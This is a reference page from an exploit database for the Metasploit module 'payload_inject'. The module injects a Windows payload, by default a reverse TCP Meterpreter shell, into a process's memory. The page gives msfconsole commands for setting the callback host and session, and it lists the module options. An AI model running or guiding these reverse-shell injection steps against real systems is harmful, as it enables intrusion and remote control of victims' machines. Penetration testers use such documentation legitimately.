Windows Manage Memory Payload Injection Module | Metasploit Exploit Database (DB)

Home > Exploit DB

Windows Manage Memory Payload Injection Module

This module will inject into the memory of a process a specified windows payload. If a payload or process is not provided one will be created by default using a reverse x86 TCP Meterpreter Payload.

Search Other Modules

Rank

Normal

Authors

Carlos Perez < carlos_perez [at] darkoperator.com >

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use post/windows/manage/payload_inject
msf post(payload_inject) > set LHOST [MY IP ADDRESS]
msf post(payload_inject) > set SESSION [INTEGER]

Module Options

HANDLER	Start an Exploit Multi Handler to receive the connection
LHOST	IP of host that will receive the connection from the payload.
LPORT	Port for Payload to connect to. (default: 4433)
OPTIONS	Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. (default: )
PAYLOAD	Windows Payload to inject into memory of a process. (default: windows/meterpreter/reverse_tcp)
PID	Process Identifier to inject of process to inject payload.
SESSION	The session to run this module on.
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module